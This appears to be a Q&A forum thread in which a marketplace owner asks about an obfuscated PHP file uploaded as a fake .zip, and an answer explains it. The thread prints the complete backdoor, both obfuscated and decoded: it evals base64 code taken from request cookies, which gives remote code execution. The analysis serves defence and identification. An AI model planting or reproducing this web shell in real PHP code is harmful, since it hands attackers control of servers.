Has anyone seen code obfuscated like this before? What does it mean?

Question

I own a digital goods marketplace, and a vendor uploaded this file, it was a zip file but showed up as corrupt in windows. When I opened it in linux I was shocked to see the file itself was a php file that someone added a .zip extension to.

Has anyone seen code like this before? Can anyone help me make sense of it? Is it malicious?

<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","wswtwrw_wrwepwlwacwe");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "bibabisbie64bi_dbiebicbiobidbie");
$iign = $cyvj("x","","xcxrxexaxtxex_funxctixon");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>

This is what I have from it so far.

<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","str_replace");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "base64_decode");
$iign = $cyvj("x","","create_function");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>

$xzfy = create_function(base64_decode(JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdtYScgJiYgJGMoJGEpPjMpeyRrPSdzZXJhdGknO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10nJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9))

$c='count';$a=$_COOKIE;if(reset($a)=='ma' && $c($a)>3){$k='serati';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}

Answer 1

TL;DR This code let's people use cookies to execute arbitrary scripts on your server

What the code is doing is using a bunch of random base64 strings to create a function and then immediately execute it. I took the time de-obfuscate the function a bit, giving the following:

if($_COOKIE[0] =='ma' && count($_COOKIE)>3){
    echo '<serati>';
    eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
    echo '</serati>';}

The important line is this one:

eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));

Let's break it up into parts:

1. join(array_slice($_COOKIE,count($_COOKIE)-3))

This piece joins together all items in the $_COOKIE array starting at count($_COOKIE) - 3 until the end of the array (make it all one string)

2. preg_replace(array('/[^\w=\s]'','/\s/'), array('','+')

Firstly, this searches through the newly created string for the pattern "example= ' " (where example can be any word) and replace it with Nothing. So if the string had:

test= 'blah' it would be replaced with blah'.

This also replaces all whitespace with +.

3. eval(base64_decode(..));

This takes the string that was just created (something in base64, presumably) and decodes it to a human readable format. It then takes that string and executes it on the server.

Basically, this means that someone can create some cookies on their machine in base 64, and your server will smash them together into one long string, decode it and execute it.